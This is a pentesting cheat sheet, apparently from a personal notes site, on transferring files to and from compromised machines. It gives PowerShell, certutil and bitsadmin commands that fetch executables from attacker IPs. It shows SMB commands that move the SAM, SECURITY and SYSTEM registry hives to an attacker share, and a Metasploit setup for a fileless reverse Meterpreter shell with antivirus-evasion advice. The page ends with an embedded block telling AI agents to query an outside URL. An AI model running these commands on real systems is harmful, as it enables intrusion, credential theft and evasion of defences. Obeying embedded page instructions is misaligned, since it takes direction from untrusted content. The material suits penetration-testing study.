# Uploading Shells/ Transferring Files
{% embed url="" %}
windows cheatsheat
{% endembed %}
### Transfer files with SSH (SCP)
Best to copy to tmp folder as there are no restrictions mostly
```shell
scp /opt/LinEnum.sh pingu@10.10.10.10:/tmp
```
```shell
scp ubuntu@192.168.1.30:/home/ubuntu/documents.txt notes.txt
```
### Python server
```python
python3 -m http.server
```
### basic http-Server
```
http-server -p 8080
```
### Powershell downloading files
```
(new-object System.Net.WebClient).DownloadFile('http://10.9.88.34:8000/SharpHound.ps1', 'C:\Users\Administrator\Downloads\SharpHou
nd.ps1')
from cmd
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
```
### Certutil cmd windows
```
certutil -urlcache -f http://10.10.14.29:80/checkmate.exe checkmate.exe
```
### RDP with shared folder to transfer filer - xfreerdp
```
xfreerdp /u:bob /p:HTB_@cademy_stdnt! /v:10.129.202.99 +clipboard /drive:Home,/home/kali/Downloads
```
### Download files from server to machine in Windows
```
bitsadmin /transfer myDownloadJob http://192.168.18.144:8000/ammar.txt E:\Study\CEH\ammar.txt
```
### SMB Files tranfer with impacket
start smb server on attacker machine
```
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-smbserver desktop ~/Downloads -smb2support -username test -password test
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```
We can also use it without specifying username and password
```
ammartiger@htb[/htb]$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```
And now you can make aval this share on the windows system as a separate drive
```
controller\administrator@DOMAIN-CONTROLL C:\>net use z: \\10.9.88.34\desktop /user:test test
The command completed successfully.
```
And now you can transfer files to and fro from both machines.
```
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator\Downloads>copy SharpHound.ps1 z:
1 file(s) copied.
```
We can also directly move files without setting it as drive.
```
C:\> move sam.save \\10.10.15.16\CompData
1 file(s) moved.
C:\> move security.save \\10.10.15.16\CompData
1 file(s) moved.
C:\> move system.save \\10.10.15.16\CompData
1 file(s) moved.
```
### Evil-winrm
You can use upload and download command to transfer files
```
Evil-WinRM* PS C:\Users\svc-alfresco\Documents> download 20230730011352_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Documents\20230730011352_BloodHound.zip to 20230730011352_BloodHound.zip
Info: Download successful!
```
### Other web servers complete list
{% embed url="" %}
### Getting a Meterpreter shell on a compromised Windows machine
```
exploit(multi/script/web_delivery)
```
* `exploit/`: Indicates the use of a module designed to take advantage of a specific vulnerability or system configuration to execute code.
* `multi/`: Signifies that the module is cross-platform and can target multiple operating systems (Windows, Linux, macOS).
* `script/`: Specifies that the exploit delivers its payload via a script (like PowerShell, Python, or PHP).
* `web_delivery`: The name of the module that hosts a payload on a temporary web server. When the victim executes a specific one-liner command, it fetches and runs the payload in memory.
***
#### Utility: PowerShell & Windows Reverse Meterpreter
The primary utility of this module is to gain a fileless reverse shell. Instead of sending an `.exe` file that might be caught by antivirus, you provide a single PowerShell command to the target system.
**1. Usage for Windows Reverse Meterpreter**
To use this for a Windows target, you would configure the module within Metasploit as follows:
* Set Target: `set TARGET 2` (This selects the PowerShell target, as seen in your screenshot where `target => 2`).
* Set Payload: `set PAYLOAD windows/x64/meterpreter/reverse_tcp`
* Set Local Host: `set LHOST [Your_IP]`
* Execute: Type `run` or `exploit`.
**2. Full Use with PowerShell**
Once you hit `run`, Metasploit will generate a unique PowerShell "one-liner." It looks something like this: `powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -RunAs [Encoded_Command_String]`
**Why this is effective:**
* Antivirus Evasion: Because the payload is executed directly in memory via PowerShell, it never touches the hard drive, making it harder for standard antivirus programs to detect.
* Simplicity: You only need a way to execute a single line of text on the victim's machine (e.g., via a compromised web server, a malicious shortcut, or a macro).
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://notes.cavementech.com/pentesting-quick-reference/uploading-shells-transferring-files.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.